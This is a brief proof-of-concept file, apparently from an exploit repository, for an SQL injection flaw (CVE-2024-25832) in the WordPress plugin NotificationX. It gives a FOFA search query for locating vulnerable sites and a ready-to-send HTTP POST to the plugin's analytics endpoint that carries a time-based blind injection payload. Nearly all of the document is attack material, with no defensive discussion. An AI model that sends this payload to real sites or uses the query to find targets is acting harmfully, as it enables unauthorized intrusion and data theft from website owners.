wy876_POC/WordPress插件NotificationX存在sql注入漏洞(CVE-2024-25832).md

286 B

WordPress插件NotificationX存在sql注入漏洞(CVE-2024-25832)

fofa

body="/wp-content/plugins/notificationx"

poc

POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: 
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}